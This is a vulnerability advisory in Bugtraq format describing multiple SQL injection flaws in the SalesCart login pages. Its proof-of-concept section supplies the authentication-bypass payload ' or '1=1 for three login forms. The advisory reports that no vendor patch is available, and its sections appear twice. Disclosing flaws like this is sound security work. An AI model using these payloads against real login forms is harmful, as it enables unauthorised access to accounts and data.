SalesCart Login Multiple SQL Injection Vulnerabilities
BID:33534
Info
SalesCart Login Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 33534 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2009 12:00AM |
| Updated: | Feb 02 2009 08:09PM |
| Credit: | ByALBAYX |
| Vulnerable: |
SalesCart SalesCart 0 |
| Not Vulnerable: | |
Discussion
SalesCart Login Multiple SQL Injection Vulnerabilities
SalesCart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SalesCart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
SalesCart Login Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example data is available:
http://www.example.com/scorderdemo/online/default.asp
UserID : ' or '1=1
Password : ' or '1=1
http://www.example.com/scorderdemo/online/customer/customer_login.asp
Ship-to Email Address : [email protected]
Password : ' or '1=1
http://www.example.com/scorderdemo/online/affiliate/affiliate_login.asp
Ship-to Email Address : [email protected]
Password : ' or '1=1
Attackers can use a browser to exploit these issues.
The following example data is available:
http://www.example.com/scorderdemo/online/default.asp
UserID : ' or '1=1
Password : ' or '1=1
http://www.example.com/scorderdemo/online/customer/customer_login.asp
Ship-to Email Address : [email protected]
Password : ' or '1=1
http://www.example.com/scorderdemo/online/affiliate/affiliate_login.asp
Ship-to Email Address : [email protected]
Password : ' or '1=1
Solution / Fix
SalesCart Login Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].